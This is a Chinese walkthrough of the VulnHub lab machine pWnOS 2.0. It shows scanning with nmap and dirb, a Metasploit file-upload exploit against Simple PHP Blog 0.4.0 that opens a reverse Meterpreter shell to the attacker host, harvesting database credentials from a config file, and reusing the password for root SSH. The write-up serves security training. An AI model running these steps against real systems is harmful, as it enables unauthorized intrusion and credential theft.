本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
目标:PWNOS: 2.0 (PRE-RELEASE)
文章目录
1.1环境介绍
下载地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub
flag数量:1
攻击机:kali
攻击机1地址:10.10.10.128
靶场地址:10.10.10.100(s)
1.2工具使用
1.2.1 nmap:
Nmap(“Network Mapper(网络映射器)”)是一款开放源代码的网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络,当然用它扫描单个主机也没有问题。Nmap一新颖的方式使用原始IP报文来发现网络上有哪些主机,哪些主机提供什么服务(应用程序名和版本),哪些服务运行在什么操作系统(包括版本信息),它们使用什么类型的报文过滤器/防火墙,以及一堆其它功能。虽然Nmap通常用于安全审核,许多系统管理员和网络管理员也用它来做一些日常的工作,比如查看整个网络的信息,管理服务升级计划,以及监视主机和服务的运行。
官网地址:https://namp.org
1.2.2 msf:
-
Metasploit(MSF)是一个免费的、可下载的框架
它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。
当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。
1.2.3 dirb:
dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站
格式:dirb <url_base> [<wordlist_file(s)>] [options]
-a 设置user-agent
-p <proxy[:port]>设置代理
-c 设置cookie
-z 添加毫秒延迟,避免洪水攻击
-o 输出结果
-X 在每个字典的后面添加一个后缀
-H 添加请求头
-i 不区分大小写搜索
1.3服务介绍
1.3.1MySQL:
MySQL 是最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。
数据库(Database)是按照数据结构来组织、存储和管理数据的仓库。
每个数据库都有一个或多个不同的 API 用于创建,访问,管理,搜索和复制所保存的数据。
我们也可以将数据存储在文件中,但是在文件中读写数据速度相对较慢。
所以,现在我们使用关系型数据库管理系统(RDBMS)来存储和管理大数据量。所谓的关系型数据库,是建立在关系模型基础上的数据库,借助于集合代数等数学概念和方法来处理数据库中的数据。
RDBMS 即关系数据库管理系统(Relational Database Management System)的特点:
- 1.数据以表格的形式出现
- 2.每行为各种记录名称
- 3.每列为记录名称所对应的数据域
- 4.许多的行和列组成一张表单
- 5.若干的表单组成database
1.3.2 SSH服务:
SSH(Secure Shell,安全外壳)是一种网络安全协议,通过加密和认证机制实现安全的访问和文件传输等业务。传统远程登录或文件传输方式,例如Telnet、FTP,使用明文传输数据,存在很多的安全隐患。随着人们对网络安全的重视,这些方式已经慢慢不被接受。SSH协议通过对网络数据进行加密和验证,在不安全的网络环境中提供了安全的登录和其他安全网络服务。作为Telnet和其他不安全远程shell协议的安全替代方案,目前SSH协议已经被全世界广泛使用,大多数设备都支持SSH功能。
1.4漏洞介绍
1.4.1 ssh弱口令:
弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。
1.4.2 CVE 2005-2787 2005-2733 2005-2192:
Simple PHP Blog 0.4.0 - Multiple Remote s - PHP webapps Exploit (exploit-db.com)
Simple PHP Blog是一个绝对简单的PHP博客程序。Simple PHP Blog不需要数据库,采用纯文本文件,看上去还不错。Simple PHP Blog的主要优点有,它仅需要PHP 5和写入权限。没有设置,只是解压缩和复制。
1.5渗透步骤
1.5.1扫描端口
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 10.10.10.100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-04 05:15 EST
Nmap scan report for 10.10.10.100
Host is up (0.000092s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:2A:E1:E6 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.01 seconds
#可以看出提供了很多服务,http ssh都是可以利用的
1.5.2 使用dirb
┌──(root㉿kali)-[~]
└─# dirb http://10.10.10.100 /usr/share/wordlists/dirb/big.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 4 06:00:54 2023
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)
---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/colors (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5902)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8093)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5651)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4935)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5293)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upload_img (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Jan 4 06:01:24 2023
DOWNLOADED: 40916 - FOUND: 28
#访问http://10.10.10.100/blog/
#查看源码可以知道博客版本号
1.5.3 搜索 Simple PHP Blog 0.4.0漏洞并且使用msf利用
┌──(root㉿kali)-[/home/git_conf]
└─# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v6.2.26-dev ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search Simple PHP Blog 0.4.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/sphpblog_file_upload
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/sphpblog_file_upload) > show options
Module options (exploit/unix/webapp/sphpblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /sphpblog yes Sphpblog directory path
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.10.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/sphpblog_file_upload) > set rhosts 10.10.10.100
rhosts => 10.10.10.100
msf6 exploit(unix/webapp/sphpblog_file_upload) > set uri /blog
uri => /blog
msf6 exploit(unix/webapp/sphpblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.10.128:4444
[+] Successfully retrieved hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as oo4HMo:BgcDWb
[+] Successfully retrieved cookie: jvt27g980ck0du05h20bi91nl2
[+] Successfully uploaded 1jqiyq9jALglWoUzLJlG.php
[+] Successfully uploaded zEmTR5v16rhMNSjrTERf.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/1jqiyq9jALglWoUzLJlG.php
[*] Calling payload: /images/zEmTR5v16rhMNSjrTERf.php
[*] Sending stage (39927 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.100:41464) at 2023-01-04 06:19:58 -0500
[+] Successfully removed /images/zEmTR5v16rhMNSjrTERf.php
meterpreter > shell
Process 1091 created.
Channel 0 created.
sh: getcwd() failed: No such file or directory
sh: getcwd() failed: No such file or directory
whoami
#www-data
sudo -l
sudo: no tty present and no askpass program specified
cd /var/www
ls
activate.php
blog
includes
index.php
info.php
login.php
mysqli_connect.php
register.php
#查询到数据库
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Cou
?>
#但是无法连接
mysql -uroot -p'goodday'
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using passwor
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
#有文件说明mysql存在,find命令搜索一下
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
pwd
/var
ls
backups
cache
crash
index.html
lib
local
lock
log
mail
mysqli_connect.php
opt
run
spool
tmp
uploads
www
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
#尝试一下是否可以用ssh登录,因为有些管理员管理员为了方便记忆可能不会更改
1.5.4 ssh登录
┌──(root㉿kali)-[~]
└─# ssh root@10.10.10.100
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)
* Documentation: http://www.ubuntu.com/server/doc
System information as of Wed Nov 9 15:02:51 EST 2022
System load: 0.0 Processes: 83
Usage of /: 3.3% of 38.64GB Users logged in: 0
Memory usage: 24% IP address for eth0: 10.10.10.100
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~#
#成功登录…………………………
1.5.4 1.5.10.1 得到flag
root@web:~# cd /root
root@web:~# ls
root@web:~# cd /home/
root@web:/home# ls
dan
root@web:/home# cd dan/
root@web:/home/dan# ls
root@web:/home/dan# cd /root
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~#
#好吧没有flag但是得到最终权限
root@web:/home# cd dan/
root@web:/home/dan# ls
root@web:/home/dan# cd /root
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~#
#好吧没有flag但是得到最终权限